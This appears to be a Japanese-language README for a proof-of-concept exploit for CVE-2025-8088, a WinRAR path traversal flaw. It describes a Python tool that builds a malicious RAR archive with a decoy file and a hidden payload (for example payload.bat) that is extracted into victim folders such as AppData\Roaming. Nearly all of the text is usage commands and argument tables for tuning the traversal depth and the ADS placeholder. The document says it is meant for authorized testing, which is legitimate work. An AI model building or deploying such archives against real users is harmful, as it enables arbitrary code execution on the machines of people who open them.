
CVE-2025-8088の概念実証エクスプロイト。巧妙に細工されたRARアーカイブを介して任意のコード実行を可能にするWinRARパストラバーサル脆弱性。許可されたセキュリティテスト用に設定可能なデコイ、ペイロード、ドロップパスを備えたPythonスクリプトを含む。
Exploit_cve_2025_8088.ps1
python poc.py

# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20
| Argument | 説明 | 例 |
|---|
--decoy | デコイファイルへのパス(存在しない場合は作成されます) | resume.txt |
--payload | ペイロードファイルへのパス(存在しない場合は作成されます) | payload.bat |
--drop | ペイロードが展開されるターゲットディレクトリの絶対パス | C:\Users\Victim\Documents |
| Argument | 説明 | デフォルト値 | 備考 |
|---|
--rar | rar.exe へのパス | 自動検出 | 一般的な場所とPATHをチェックします |
--out | 出力RARファイル名 | poc-cve-2025-8088.rar | 最終的な悪意のあるアーカイブ |
--workdir | 一時ファイル用の作業ディレクトリ | カレントディレクトリ (.) | |
--placeholder_len | ADSプレースホルダーの長さ | max(len(target_path), 128) | 長いほどトラバーサルがより確実になります |
--max_up | 親ディレクトリへのトラバーサル回数 (..\) | 16 | 最小8を推奨 |
--base_out | 中間ベースのRARファイル名 | <out>.base.rar | 一時ファイル(使用後に削除されます) |